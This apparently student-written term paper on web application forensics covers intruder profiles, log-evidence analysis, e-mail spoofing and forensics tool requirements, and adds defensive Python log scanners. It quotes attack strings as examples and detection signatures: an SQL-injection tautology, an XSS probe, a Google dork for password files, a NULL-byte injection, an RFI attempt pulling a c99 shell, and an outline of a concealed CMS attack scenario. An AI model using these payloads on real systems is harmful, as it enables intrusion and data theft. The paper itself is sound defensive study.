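Mass SQLIA of the LizaMoon kind leaves its footprint inside database text columns, from where the injected markup is later rendered into every generated page. As a purely illustrative aid to the remediation of such an incident, the following minimal sketch sweeps exported page content (or dumped text columns) for script references pointing outside a whitelist of trusted domains; the file names and the domain whitelist are assumptions, not details taken from the cited incident reports.

    import re
    import sys
    from urllib.parse import urlparse

    # Domains the application legitimately loads scripts from (assumption for illustration).
    TRUSTED_DOMAINS = {"www.example.org", "cdn.example.org"}

    # Matches <script ... src="..."> regardless of quoting style.
    SCRIPT_SRC = re.compile(r'<script[^>]+src\s*=\s*["\']?([^"\'\s>]+)', re.IGNORECASE)

    def suspicious_script_refs(html_text):
        """Return script URLs that point outside the trusted domain set."""
        hits = []
        for url in SCRIPT_SRC.findall(html_text):
            host = urlparse(url).netloc.lower()
            if host and host not in TRUSTED_DOMAINS:
                hits.append(url)
        return hits

    if __name__ == "__main__":
        # Usage: python sweep_scripts.py dumped_page_1.html dumped_page_2.html ...
        for path in sys.argv[1:]:
            with open(path, encoding="utf-8", errors="replace") as fh:
                for ref in suspicious_script_refs(fh.read()):
                    print(f"{path}: external script reference -> {ref}")

Such a sweep does not replace the forensic investigation; it merely narrows down where the injected payload ended up, so that the affected records and the vulnerable input paths can be examined in detail.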
  • 14. 2.Intruder profiles and Web Attacking Scenarios At the end of this Chapter let's deliberate some interesting trends, concerning the current Web Attacks. 2.3. New Trends in Web Attacking deployment and preventions Discussing the deployment of Web Attacks, we should consider a more realistic approach, for categorizing Web Attacking Vectors. As mentioned above, there are two general profiles of the Web Intruders. Keeping in mind, the differences of the Attacks' deployment and the level of Attacks' sophistication, it should be more appropriate to discuss the accomplishment of Web Attacking Scenarios, rather than the deployment of Web Application Attacks. In such Attacking Scenarios, which represent a fundamental construct, the Web Attacks should be denoted as execution techniques in a given attacking setting. This allows us to define single layer attacks, multi-layer attacks, and special attacking sequences as specific implementations in the realization of the Web Attacking Scenario. Such scenarios can adequately illustrate the intention of the different profiles of Web Intruders. In distinction to the intelligent Web Intruder, the standard Intruder tries to accomplish a simple attacking scenario, reduced to the utilization of a special Web attacking technique. The Web attacking scenario represents a simple deployment construct: try a well- established attacking procedure(s) and wait for result(s), no matter what. As mentioned above, the intelligent Intruder utilizes more sophisticated scenarios. Some of them could be planned and sequentially accomplished in a long period of time, till achieving the expected result(s). There are cases in which the intelligent attacker could gain enough feedback from the victim application and thus intentionally reduce the attacking scenario to the deployment of one or a compact amount of attacking techniques, which resembles the scenario to the level of the standard intruder's scenario. Nevertheless, important aspects like utilization of non-standard attacking techniques and less noise at the attacking environment obviously discern the one profile from the another. These conclusions should be extended in the Chapters, concerning the more detailed representation of WAFO. Let's illustrate the Web Application Scenario construction in the next Figure: Figure 2: Web attacking scenario taxonomic construction 15
  • 15. 2.Intruder profiles and Web Attacking Scenarios The proposed construct should be extended in the next Table, which denotes an example of a possible Web attacking scenario: Example Attack on well-known CMS [inject c99 shell on the CMS, as a paradigm] Scenario • What is the particular goal: PoC, ID Theft, destroying Personal Image etc. • determine the CMS version, • determine the technical implementation type: concurrent attacking, or sequentially attacking of specific Webapp modules • localize the modules to be compromised: Web Front-end, RDBMS, WebMail interface, News feeder etc. • if CMS version obsolete: • find published exploits( at best 0days16) and utilize them to gather feedback from the victim environment • respect scanning noise as low as possible • if version is up-to-date utilize: • blind application scanning techniques with noise reduction and wait for positive feedback • analyze the results and proceed with further more specific attacking techniques • if success, utilize a refinement of the attack and if of interest, wait for CMS admins reaction- gives feedback on sanitization response time, efforts, utilized hardening techniques etc. • if not successful: • audit the gathered feedback • wait for new published 0day exploits • develop a 0day(s) independently • utilize an scenario sequence execution loop till achieving the goal with respect to: • ( communication) attacking noise • and...try to stay concealed Technique(s) XSS: SQLIA: CSRF CSFU Particular ... Common well- (these should * NP-XSS17 * error 0day(s) established be ordered, or * P-XSS response like: reordered * timing sniffing for open according the SQLIA ... admin debugging attacking console access on scenario) port 1099 Procedures NP-XSS: Error response SQLIA: ... ( these should • detect dynamic modules on the Webapp, • Step 1, be ordered, or • find variables to be compromised, • Step 2, reordered as • craft the malicious GET- Request and appropriate) taint the input value of the variable to be • … exploited • Step n; • gather feedback • resemble the procedure till expected results are achieved • spread the malicious link to as many as possible 'Confused Deputies'[4] Table 3: Example of possible Webapp attacking scenario 16 http://netsecurity.about.com/od/newsandeditorial1/a/aazeroday.htm 17 NP- XSS denotes non-persistent XSS; P-XSS abbreviates the Persistent XSS 16
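The NP-XSS procedure in Table 3 hinges on crafting a GET request whose tainted parameter value is reflected back by the vulnerable module. The following minimal sketch, in which the parameter name, payload and log entry are purely illustrative, shows how such a probe looks once URL-encoded and how a simple RegEx check over an access-log entry might flag it; real rule sets, such as those used by the Scalp! tool mentioned in Chapter 4, are considerably richer.

    import re
    from urllib.parse import quote

    # Illustrative NP-XSS probe; parameter name and payload are assumptions.
    payload = "<script>alert(1)</script>"
    probe = "/search.php?q=" + quote(payload)
    print("Request line as crafted by the intruder:", "GET " + probe + " HTTP/1.1")

    # Very rough detector: script tags (plain or URL-encoded) and common
    # JavaScript vectors inside the requested resource of a log entry.
    XSS_HINT = re.compile(r"(<script\b|%3Cscript|onerror\s*=|javascript:)", re.IGNORECASE)

    sample_log_entry = ('203.0.113.7 - - [05/Sep/2011:10:12:31 +0200] '
                        '"GET ' + probe + ' HTTP/1.1" 200 512')
    if XSS_HINT.search(sample_log_entry):
        print("XSS-like pattern found:", sample_log_entry)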
  • 16. 2.Intruder profiles and Web Attacking Scenarios How this maps onto the proposed profiles of modern Web intruders is illustrated as follows:
Attacking Scenario - Standard Intruder: static; the execution remains on the level of published and well-established 'Web attacks'. Intelligent Intruder: highly dynamically adaptive18.
Techniques - Standard Intruder: static (as a comment: ... better watch it on YouTube19, see [4]). Intelligent Intruder: could remain static, but preferably the cyber criminal adapts them according to the successful completion of the attacking scenario.
Procedures - Standard Intruder: static, "... just copy and paste"; a 0day is utilized with low likelihood. Intelligent Intruder: could be static, but preferably the intruder seeks a 0day(s).
Table 4: Standard vs. Intelligent Web intruder
Another important aspect concerning the prevention and sanitization of successfully deployed Web Application attacking scenarios is illustrated by Rafal Los20 in his presentation at OWASP AppSecDC in October 2010 [10]. The main topic of his research is the Execution-Flow-Based approach as a supportive technique for Web Application security (pen-)testing. The utilization of Web Application Scanners (WAS) is impressive: it supports the pen-testing job of the security professional/ethical hacker and, not to forget, of the intelligent intruder [11], [4]. Indeed, WAS can effectively map the attacking surface of the Webapp intended to be compromised. Still, open questions remain, such as: do WAS provide full Webapp function- and data-flow coverage, which would give greater feedback for a complete, detailed security audit of the Web construct? Most pen-testers/ethical hackers do not care which functions of the Webapp should be tested. If they do not know the functional structure and the data-flow of the Web Application exactly, how can they ensure appropriate and complete functional coverage during the pen-testing of the Webapp? The job of the pen-tester is to reveal exploits and drawbacks in the realization of a Web Application before the intelligent intruder does. Consequently, the next question arises: what are the objective parameters that designate the pen-testing job as completed and well done? As Rafal Los states, the pen-testing of Webapps utilizing WAS must nowadays still be regarded as “point'n'scan web application security”. The security researcher suggests in his presentation that a more reasonable Webapp hardening approach is the combination of application function-/data-flow analysis with the subsequent security scanning of the observed Web implementation. A valuable comparison between the approach indicated by Rafal Los and the common security testing of Webapp(s), outlining the drawbacks of the latter, is given in Table 9, Appendix A. 18 Respecting the current level of sanitization know-how, the produced attacking noise, the reactions of the security professionals to sanitize the particular Webapp, and the specific goal for compromising the victim Webapp 19 The author of the paper does not intend to be offensive to YouTube; nevertheless the facts are: this on-line video platform is well-established and popular, and there are tons of videos hosted on it concerning Classic SQLIA derivatives, XSS derivatives etc., which can easily be found and utilized by script kiddies, hacker wannabes ... 20 http://preachsecurity.blogspot.com/ 17
  • 17. 2.Intruder profiles and Web Attacking Scenarios Let's summarize these drawbacks, as follows. The current Webapp pen-testing approaches via scanning tools do not deliver adequate functional coverage of modern and dynamic high sophisticated Web Applications. Furthermore, the Business Logic of the Webapp(s) is often underestimated as a requirement for the proper pen-testing utilization. A complete coverage of the functional mapping of the Web Application could still not be approved. If the application execution flow is not explicitly conversant, the questions, regarding completeness and validity of the results from the tested data, should be denoted as open. Therefore, Rafal Los suggests, utilization of Application-Flow Analysis( AFA) in the preparation part prior to the deployment of the specific Web Application scanning. This combination of the two approaches should deliver better results than those from the blind point'n'scan examinations. Explanation of this approach is illustrated in Figures 16, 17 and Tables 10, 11, 12, given at Appendix A. For more information, please refer to [10], or consider studying the snapshot of the live presentation[L7]. We should designate these statements as highly applicable for the better utilization of WAFO, as well. The lack of complete and precise knowledge of the functional structure and data flow of the forensically observed Webapp, should definitely detain the proper and accurate implementation of WAFO. We should keep in mind these conclusions and extend them in the following Chapters of the paper. Let's proceed with the more detailed representation of the Web Application Forensics. 18
  • 18. 3.Web Application Forensics 3. Web Application Forensics The main task, this Chapter represents, is to proceed further with the taxonomic description of WAFO, by describing the victim environment, e.g. to designate in detail the Web application in production environment. This should be specifically utilized on behalf of the facts: explaining, how Webapp forensics is applied to this environment; determining, what are the main concerning aspects to WAFO; establishing these statements via particular examples and outlining collaborative techniques, which extend the proper WAFO investigation. See again Table 2. We proposed in the former Chapters that, utilizing WAFO on behalf of best practices and only should not be considered as reasonable. Presuming this, we should emphasize further explicitly that, trial-and-error approaches and conclusions,relying on personal experience and high-level skills, can not be approved as sufficient requirements for proper WAFO deployment. On the one hand we discover high information abundance, concerning the prior discussed complexity aspects of RIA Webapps, on the other the impulse for applying appropriate WAFO on these high-level sophisticated applications is immense. Once again, this confirms the need for proper taxonomy- not best-practices, presenting a recipe shaping of the Web Application Forensics investigation, but categorizations, approved to be universally valid and compact in their representation. Let's conclude the illustration of the Webapp forensics' categorization and extend the described taxonomic aspects heretofore. Respecting the post mortem strategies, after intruder's attack is successfully accomplished and damage is presented, we specify two general approaches for Webapp sanitization- Incident Response( IR) and Web Application Forensics. In a word, the differences between them, should be outlined as follows. The remediation scenario, applied to the compromised application and focused on the regaining of the implementation's complete functionality, is the main concern of the Incident Response. In distinction to this, the Forensics investigation focuses on gathering the maximum collection of evidence, which is relevant for the IR utilization and should be employed to a court of jurisdiction, if required. Let's demonstrate the complete overview of the Digital Forensics structure and point out the dependencies between IR and CFO, as well as, the dependencies between WAFO and the other Forensics fields. This is illustrated in the next Figure 3. 19
  • 19. 3.Web Application Forensics Figure 3: Digital Forensics: General taxonomy For the reader concerned, please refer to [12], where IR and Forensics approaches are compared in detail. More general representation on the topics IR and Forensics should be found at [1], [13], [14]. In this way of thoughts, we should derive and should specify the following fundamental questions( *), concerning WAFO: 1. how can we describe an environment as ready for Forensics investigations, 2. what evidence should we look for and 3. what is the definition of their location, 4. how can we extract the payload of the Forensics evidence raw data, concerning its proper application in the further steps of IR. Let's designate the general procedure in the implementation of WAFO. The next Figure 4: 20
  • 20. 3.Web Application Forensics Figure 4: WAFO phases, in Jess Garcia[1] This illustrates, with universal validity, the following steps of the WAFO deployment: • Seizure: the problem is designated; • Preliminary Analysis: preparation for the specific WAFO investigation; • Investigation/Analysis loop: analyzing the collected evidence and proceeding in this manner until the collection of evidence is maximal and complete. Along these lines, we should underscore the Standard Tasks that WAFO utilizes, as in [15]:
1. Understand the “normal” flow of the application
2. Capture application and server configuration files
3. Review log files: Web Server, Application Server, Database Server, Application
4. Identify potential anomalies: malicious input from client, breaks in normal web access trends, unusual referrers, mid-session changes to cookie values
5. Determine a remediation plan
Table 5: Web Application Forensics Overview, in [15]
Let us categorize the evidence next, as an argumentation to the second fundamental question, see (2,*), in Table 6 on the following page; before that, the short sketch below illustrates the 'capture' task from Table 5 in practice. 21
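Task 2 of Table 5 is also the point at which evidence integrity should be established: a common practice is to record a cryptographic hash of every captured file at collection time, so that the items can later be shown to be unaltered. A minimal, hedged sketch; the list of paths is purely illustrative and would in reality follow from the application-flow analysis of the concrete environment.

    import hashlib
    import json
    import os
    import time

    # Illustrative capture list (assumption); adapt to the concrete Webapp environment.
    EVIDENCE = [
        "/etc/apache2/apache2.conf",
        "/var/log/apache2/access.log",
        "/var/log/apache2/error.log",
        "/var/www/app/config.php",
    ]

    def sha256_of(path, chunk=1 << 20):
        """Hash a file in chunks so large logs do not have to fit into memory."""
        digest = hashlib.sha256()
        with open(path, "rb") as fh:
            while True:
                block = fh.read(chunk)
                if not block:
                    break
                digest.update(block)
        return digest.hexdigest()

    manifest = []
    for path in EVIDENCE:
        if not os.path.exists(path):
            manifest.append({"path": path, "status": "missing"})
            continue
        info = os.stat(path)
        manifest.append({
            "path": path,
            "size": info.st_size,
            "mtime": time.strftime("%Y-%m-%dT%H:%M:%S", time.localtime(info.st_mtime)),
            "sha256": sha256_of(path),
        })

    # The manifest itself becomes part of the evidence record.
    print(json.dumps({"collected_at": time.strftime("%Y-%m-%dT%H:%M:%S"),
                      "items": manifest}, indent=2))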
  • 21. 3.Web Application Forensics Digital Forensics evidence: • Human Testimony • Peripherals • Environmental • External Storage • Network traffic • Mobile Devices • Network Devices • … ANYTHING ! • Host: Operating Systems, Databases, Applications Table 6: A general Taxonomy of the Forensics evidence, in [1] To specify the source of the different Forensics evidence, see (3,*), we should clarify the 'Players', as Jess Garcia in [1], contributing to the Layer 7 communication as follows, see Table 7: Type of 'Players': … and their Implementation in the Web traffic: Network Traffic Common Operating Systems Client Side ( Web) Browsers Web Servers Server Side Application Servers Database Servers Table 7: Common Players in Layer 7 Communication, in Jess Garcia [1] A reasonable WAFO should present an inspection/ analysis of all evidence these 'Players' produce, which consists of: inspecting the Network traffic logs( inspecting logs of supportive Applications as NIDS, IDS, IPS), analysis of the hosts OS logs( incl. HIPS, HIDS, Event logs etc.), header and cookie inspection of the users' Browsers, inspection of the Server logs, belonging to the Web Application Architecture, cache inspection etc. As we propose in the former Chapter 2, this should not be a simple task, especially when the Webapp is highly process-driven( e.g. AJAX, Silverlight, Flash etc.). This should require additional application-flow analysis, which considers an explicit knowledge, respecting the functional- and data- flow map of the Webapp. The human factor should not be underestimated in this regard. Finally, there is also the important matter of the legal aspects, related to the deployment of the WAFO investigation, which the security professional should be aware of and should maintain during the Web Application Forensics process. We should not discuss this matter in detail. The interested reader should find more information, concerning this topic at [16] and also, as already proposed, in [7]. With respect to the forth fundamental question, see (4,*), focusing on the evidence payload extraction, we should discuss this more detailed in the next Section 3.1. of this Chapter. To conclude this discussion, we should consent to argue the leading fundamental question, pointing out the Forensics readiness concerns, see (1,*). 22
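Part of that readiness question can be answered mechanically before any manual work starts; the minimal sketch below simply checks whether the expected log sources exist at all, contain data, and are still being written to. The paths and the 24-hour staleness threshold are assumptions for illustration, not recommendations.

    import os
    import time

    # Hypothetical list of log sources the WAFO environment is expected to provide.
    EXPECTED_LOGS = [
        "/var/log/apache2/access.log",
        "/var/log/apache2/error.log",
        "/var/log/mysql/mysql.log",
        "/var/log/modsecurity/audit.log",
    ]

    MAX_SILENCE_HOURS = 24  # assumption: a live source should have been written within a day

    def assess(path):
        if not os.path.exists(path):
            return "MISSING - logging not present or misconfigured"
        info = os.stat(path)
        if info.st_size == 0:
            return "EMPTY - source exists but records nothing"
        age_hours = (time.time() - info.st_mtime) / 3600.0
        if age_hours > MAX_SILENCE_HOURS:
            return "STALE - last write %.1f hours ago" % age_hours
        return "OK"

    for log in EXPECTED_LOGS:
        print(log, "->", assess(log))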
  • 22. 3.Web Application Forensics An environment which is not prepared for forensic investigation in an appropriate manner, i.e. where: • application logging is not present or not adequately adjusted, • no supportive forensic tools are applied to the WAFO environment (IDS/IPS etc.), • users are not well trained for forensics collaboration; can hamper the Web Application Forensics investigation to the point that the evidence collection is considerably incomplete and WAFO cannot be applied to the environment at all [1]. That is why the matter of Forensics Readiness must be regarded as fundamental in the taxonomy of WAFO, concerning the Preliminary Analysis phase of the Web Application Forensics deployment. An illustrative example of Forensics Readiness can be found in [13], referenced in Appendix A, Figure 18. Having specified the general taxonomy of the WAFO victim environment, let us proceed with further examples designating the deployment of different Web Application Forensics techniques. On the one hand, they make the paper's exposition more illustrative; on the other, they address the reasonable question of how WAFO payload data is gained from evidence in practice. 3.1. Examples of Webapp Forensics techniques In this section we describe different cases of WAFO deployment, concerning Client Side and Server Side forensic analysis, on given real-life examples, organized as follows: main topic, possible attacks, illustration of WAFO techniques. Extraneous White Space on the Request Line This example is discussed in [3]; it provides evidence of anomalies in HTTP requests stored in the Webapp server log. The whitespace between the requested URL and the protocol should be considered suspicious. The next Figure shows a poorly constructed robot which obviously intends to accomplish a remote file inclusion: Figure 5: Extraneous White Space on Request Line, in [3] Google Dorks The exploitation of the Google search capabilities may be illustrated with the next search query [3]: 23
  • 23. 3.Web Application Forensics intitle:”Index of” master.passwd The produced evidence appears in the server logs as follows: Figure 6: Google Dorks example, in [3] The author of the book [3] states that such requests are still very untargeted, because they are chaotic, in the sense that the target is not explicitly specified in the search query. Nevertheless, they should not be underestimated. In this respect, the next example follows, produced by spammers utilizing the Google search engine for the same purpose: Figure 7: Malicious queries at Google search by spammers, in [3] Faking a Referring URL A great21 job of faking Referrer URL22 credentials is done by spammers. In the next example, the faked part of the URL is the anchor identifier, which is only used for accessing different parts of the displayed web page content. Such GET requests cannot be valid log file entries resulting from clicks on the Web page, because the Web server reproduces the whole Web page and does not explicitly care about that part of its content; thus such a log entry should be classified as malicious and, once again to be mentioned, not produced by regular Web surfing activity: Figure 8: faked Referrer URL by spammers, in [3] Remote File Inclusion A good example of common request-URL attacks is the next Remote File Inclusion (RFI)23 attempt stored in the Web Server log: Figure 9: RFI, pulling c99 shell, in [3] The attempt to pull the well-known c99 shell onto the running machine by means of a GET request is obvious. The c99 shell is classified as a malicious PHP backdoor. There is a great likelihood that Web intruders try to inject and execute such code on Open Source PHP Webapps, like different PHP-based CMSes or PHP forums. In most cases RFIs are deployed to extend the structure of compromised machines and support the utilization of botnets. 21 'great job' in terms of discussing the algorithmic approach as security professionals and by no means as favoring the malicious intentions of the Cyber criminal 22 RFC 1738 23 http://projects.webappsec.org/w/page/13246955/Remote-File-Inclusion 24
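Request-URL anomalies of the kind shown so far (extra whitespace on the request line, search-engine dorks, suspicious referrers, remote URLs passed as parameter values), as well as the URL-encoded SQLIA and NULL-byte patterns discussed next, lend themselves to a first automated pass over the access log before the manual review starts. The following minimal sketch works in the spirit of signature-based tools such as Scalp! (see Chapter 4); the signatures are deliberately simplistic, and an Apache combined log format is assumed.

    import re
    import sys
    from urllib.parse import unquote

    # Extract the quoted request line from an Apache combined-format entry (assumption).
    REQUEST = re.compile(r'"(?P<method>[A-Z]+) (?P<target>[^"]*) HTTP/[\d.]+"')

    # Deliberately simple signatures; production rule sets are far richer.
    SIGNATURES = {
        "whitespace inside request target": re.compile(r"\s"),
        "remote file inclusion attempt":    re.compile(r"=\s*(https?|ftp)://", re.IGNORECASE),
        "classic SQLIA fragment":           re.compile(r"\b(or|and)\s+1\s*=\s*1|union\s+select", re.IGNORECASE),
        "NULL-byte injection":              re.compile("\x00"),
    }

    def scan(line):
        match = REQUEST.search(line)
        if not match:
            return []
        target = unquote(match.group("target"))   # decode %27, %20, %3D, %00, ...
        return [name for name, sig in SIGNATURES.items() if sig.search(target)]

    if __name__ == "__main__":
        # Usage: python scan_access_log.py /var/log/apache2/access.log
        for path in sys.argv[1:]:
            with open(path, errors="replace") as fh:
                for number, line in enumerate(fh, 1):
                    for finding in scan(line):
                        print("%s:%d: %s: %s" % (path, number, finding, line.strip()))

Hits produced by such a screen are not findings in themselves; they only prioritize which entries the investigator correlates manually with the other evidence sources.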
Another reason for RFI is the attempt to execute code on the compromised machine and to gain access to sensitive data on it.
A simple Classic SQLIA
The following general example illustrates the utilization of an SQLIA [4] against a PHP Webapp by means of a malicious GET request:
Figure 10: Simple Classic SQLIA, in [3]
The intruder tries to compromise the 'admin' account of the Webapp, utilizing a Tautology Classic SQLIA: ' password= ' or 1=1 - - '. To place the ASCII characters apostrophe, white space and equals sign into the GET request, they are substituted by their URL-encoded representations %27, %20 and %3D.
NULL-Byte-Injection
A NULL-Byte-Injection (NBI)24 can likewise be accomplished by means of a GET request:
Figure 11: NBI evidence in Webapp log, in [3]
In the same manner as in the former example, the NUL ASCII character is URL-encoded here as %00. The attack targets the Perl login.cgi script and utilizes the NBI to open the sensitive .cgi file.
The provided examples illustrate different header inspection cases as part of Server Side Forensics. The list can be extended by further paradigms related to client-side Browser investigation techniques: Browser Session-Restore Forensics [17], Cookie inspection etc. However, we do not consider further illustrations of WAFO techniques in this section, with respect to the limited scope of the term paper. The interested reader should refer to [3] and [15] for more information. Let us proceed with an example concerning WebMail forensics.
3.2. WebMail Forensics
Web based Mail (WebMail) represents a separate construct within a Web Application. Furthermore, many firms deploy Web based mail services, like Yahoo, Amazon etc. Moreover, WebMail denotes another data input source of a Webapp; therefore, attempts to compromise Web based Mail implementations still matter. The next Figure 12 illustrates a faked (spam) e-mail:
24 http://projects.webappsec.org/w/page/13246949/Null-Byte-Injection
Figure 12: HTML representation of spam-mail (e-mail spoofing)
This designates the last case study in the examples exposition. The spam-mail should be considered representative of one of the most widely used attacking techniques concerning WebMail: e-mail spoofing. Accordingly, we illustrate a fragment of the mail header, see Figure 13:
Figure 13: e-mail header snippet of the spam-mail in Figure 12
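Such headers can also be extracted programmatically before the manual walk-through; the following minimal sketch relies on Python's standard email module and assumes the raw message source has been saved as spam.eml (a hypothetical file name):

# Minimal sketch: list the headers relevant for spotting e-mail spoofing.
from email import policy
from email.parser import BytesParser

with open("spam.eml", "rb") as fh:
    msg = BytesParser(policy=policy.default).parse(fh)

print("From:       ", msg.get("From"))
print("Sender:     ", msg.get("Sender"))
print("Return-Path:", msg.get("Return-Path"))

# Walk the Received chain from the most recent hop downwards; a sending domain
# that contradicts Return-Path / X-Envelope-Sender hints at spoofing.
for hop, received in enumerate(msg.get_all("Received") or [], start=1):
    print(f"Received hop {hop}: {received}")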
Furthermore, a different supportive attacking technique is e-mail sniffing, which is not discussed in this paper; for the reader concerned, please refer to [18], [19]. The author of the paper received the illustrated spam-mail25 in January 2011. Let us demonstrate a WebMail header inspection on the given example, as already shown in Figure 13, which explains the e-mail spoofing attempt. On the one hand, inspecting the Received header, the domain appears to be valid and belongs to facebook.com26; on the other hand, the Return-Path header as well as the X-Envelope-Sender header reveal a totally different sender. The domain specified there appears to belong to a home building company in the US. Moreover, there is another, very similar domain: 'cedarhomes.com.au'. Inspecting the Sender header next, the sender name appears to be a common name in Australia27. The correlation of the evidence is illustrative; more importantly, the e-mail spoofing attempt is identified.
A different crucial matter also concerns the discussed spam-mail. A more detailed investigation of the HTML content of the spam e-mail, prompted by the suspicious appearance of the hyperlink 'here' in Figure 12 (second row from the bottom of the HTML mask: '…, please click here to unsubscribe.'), reveals the following dangerous HTML tag content, see the next Figure:
Figure 14: Spam-assassin sanitized malicious HTML redirection, from example Figure 12
It appears that the spam-mail is intelligently devised, since the intruder is not actually interested in merely spamming the e-mail accounts. More likely, a receiver who does not use social platforms, or simply dislikes receiving such e-mails, will click on the unsubscribe link, which leads him to a malicious site. Modern versions of the Mozilla Firefox Browser detect the compromised, malicious domain 'promelectroncert.kiev.ua' and warn the Browser user in time. This interesting example illustrates the argumentation why WebMail Forensics matters. Thus we conclude this section and proceed to the last part of Chapter 3, concerning collaborative approaches from the other Forensics investigation fields that support WAFO.
3.3. Supportive Forensics
In this section we briefly discuss the supporting role of Network, Digital Image and (OS)/Database Forensics, which extend the evidence collection for a WAFO investigation. The presence of log data derived from IDS/IPS systems supports a more precise detection of the intruder's activities on the Webapp and of the IP provenance. The amount of noise the intruder produces over the network is, as described earlier, sufficient to determine the violator's profile properly. In some cases, forensic investigations of digital images uploaded to a compromised Web Application can lead to the successful detection of the intruders' origins.
25 At this point, the author of the paper would like to express his gratitude to the Rechenzentrum at Ruhr-University of Bochum for the successful sanitization of the spam-mail, utilizing spam-assassin right on time, http://www.rz.ruhr-uni-bochum.de/ , http://spamassassin.apache.org/
26 http://www.mtgsy.net/dns/utilities.php
27 http://search.ancestry.com.au
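As a simple illustration of such cross-source correlation, the following hypothetical sketch flags client IPs that appear both in the web server access log and in an IDS alert log; the file names and the plain-text formats are assumptions, since real IDS deployments use their own alert formats:

# Minimal sketch: intersect client IPs from the web server log and an IDS alert log.
import re

ip_re = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")

def ips_in(path):
    # Collect every IPv4-looking token found in the given log file.
    with open(path, encoding="utf-8", errors="replace") as fh:
        return {m.group(0) for line in fh for m in ip_re.finditer(line)}

web_ips = ips_in("access.log")
ids_ips = ips_in("ids_alerts.log")

# IPs present in both sources are the first candidates for a closer manual examination.
for ip in sorted(web_ips & ids_ips):
    print("client IP seen in both logs:", ip)

Such a simple intersection is of course only a starting point for the manual examination of the individual entries.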
This underlines once again the reasonable suggestion of extensively correlating the different payloads as forensic evidence, which reduces the number of false positives in the results; consequently, a more precise attack detection can be achieved. A very interesting example is pointed out in [3], page 285, concerning the Sharm el Sheikh case study.
Finally, we should also mention the notable case in which WAFO is hindered by the lack of sufficient Database log data. Roots of such issues can be: concealing techniques a Web intruder applies to cover the attack's traces, a malfunction in the Database engine, a lack of proper WAFO Readiness (the logging capabilities of the RDBMS are not adequately configured) etc. In such cases a successful WAFO examination of the compromised RDBMS serving as the Back-End of a Webapp is fundamentally doubtful. Nevertheless, if the RDBMS Application Server has not been restarted since the time prior to the execution of the Attacking Scenario, there is a reasonable chance to extract important forensic evidence from the RDBMS plan cache. This essential approach is discussed in detail in [16].
The techniques for the deployment of WAFO discussed in this Chapter should be considered manual techniques. If the observed environment is compact and the amount of available evidence can be examined by a human with acceptable time and effort, expanding the collection of such forensic techniques is undeniably fundamental and relevant. However, there are many cases concerning modern Webapps in which the examination of the log files exceeds human abilities, for example when the logs produced by Web Scanners amount to several Gigabytes [L8]. Another example is a WAFO investigation that has to be accomplished rapidly. In such cases the question of using automated tools that enhance the deployment of Webapp forensics becomes undoubtedly significant. Let us introduce such tools, respecting WAFO automation techniques, in the next Chapter 4.
4. Webapp Forensics tools
In [13], Jess Garcia proposes a categorization of forensics approaches, separating them into two classes: Traditional forensics methods and Reactive forensics methods. A good illustration of the main parameters characterizing the two classes is given in the next Table, derived from [13]:
Traditional Forensics Approaches:
• Slow
• Manual
• More accurate (if done properly)
• More forensically sound
• Older evidence
Reactive Forensics Approaches:
• Faster
• Manual/Automated
• Risk of False Positives/Negatives
• Less forensically sound (?)
• Fresher evidence
Table 8: Traditional vs. Reactive forensics Approaches, in [13]
Regarding the examples in Chapter 3, we should clarify that their detection can be accomplished in an acceptable amount of time only by a well trained security professional. Manually deployed WAFO investigations should be considered very precise, with a low error tolerance, though only if applied appropriately. As mentioned above, the complexity of current Web Attacking Scenarios can render the investigation process unacceptable with respect to the time aspect. Business Webapps do not tolerate down-time, which is, however, required if the Webapp image is to be processed for a reasonable WAFO. This designates the dualistic nature of a Web Application Forensics investigation: slow and precise versus faster and error prone. On the one hand, WAFO should be deployed individually for every single case of a compromised Webapp; on the other hand, the utilization of new techniques, such as the employment of automated tools in the WAFO investigation, without a doubt yields new ('fresher') forensic evidence. This is very important for the maximal collection of forensic evidence, as already proposed. In this line of thought, we should stress that the utilization of new automated techniques in WAFO is only acceptable after proper training, prior to their implementation in a production environment. It is crucial to know the particular features of the automated tool which is to be utilized; to know how the Webapp environment reacts when the tool is applied to it; to know the level of transparency, i.e. the distance between the raw log file data and the tool's feedback as evidence payload, etc. Let us outline some of the fundamental requirement parameters which qualify WAFO automated tools for enforcement in the forensic investigation process.
4.1. Requirements for Webapp forensics tools
An essential categorization of the requirements for WAFO automated tools is given by Robert Hansen in [L9]. We designate them as tool's requirements rules (TRR), as follows:
1. an automated tool candidate for WAFO should be able to parse log files in different formats
2. it should be able to take two independent and differently formatted logs and combine them
3. the WAFO tool must be able to normalize by time
4. it should be able to handle big log files in the range of GiB
5. it should allow the utilization of regular expressions and binary logic on any observed parameter in the log file
6. the tool should be able to narrow down to a subset of logical culprits
7. the automated tool should allow the implementation of white-lists
8. it should allow the construction of a list of probable culprits, against which the security investigator can pivot
9. it should also be able to maintain a list of suspicious requests which indicate a potential compromise
10. the WAFO tool should decode URL data so that it can be searched more easily in a readable format
As we will see in the further Sections of this Chapter, full compliance with the requirements enumerated so far is still not achievable by any single tool. Let us give a short explanation of them, which defines them as an appropriate constitutive basis: whether or not a specific tool implements all of these requirements, they support a more appropriate categorization of its capabilities and areas of use.
Since current Webapps are, with reasonable likelihood, served by more than one Web Server, parsing the different log formats may not be an easy task. This is a fundamental reason to decide whether it is more appropriate to utilize specialized tools related to one specific log file format, or to look for an application with a wide variety of supported log data formats. Two prominent candidates are the Microsoft IIS log file format and the Apache Web server log format28. In this line of thought, an important concern is how to combine the raw data from such concurrently running, different Web Servers in order to achieve a better correlation of the evidence, provided by the proper extraction of the payload from their log data. Furthermore, to outline coincidences, we have to consider a proper investigation of the time-stamps; a normalization by time is crucial. The matter of the sheer amount of collected log files has already been discussed sufficiently. The aspects explaining the utilization of Regular Expressions are crucial too. To illustrate this, consider the differences between Regular Expressions implemented on a black-list basis and those implemented on a white-list basis, which introduces a further parameter into the requirements list. White-listing concerns cases in which the traced payload must have a well-defined structure; if the observed input string deviates from this limited form, it is flagged as suspicious. An example is a Regular Expression (RegEx) for filtering tampered data in Webapp input fields, such as a login-ID of e-mail type. Black-listing, on the contrary, specifies which kind of construct is wrong and suspicious by default. Such filters can be evaded in a simple manner by appropriately altering the injected code, so the RegEx will, with greater likelihood, fail to detect it.
28 Statistics for the utilization of the different Web Servers can be found at: http://news.netcraft.com/
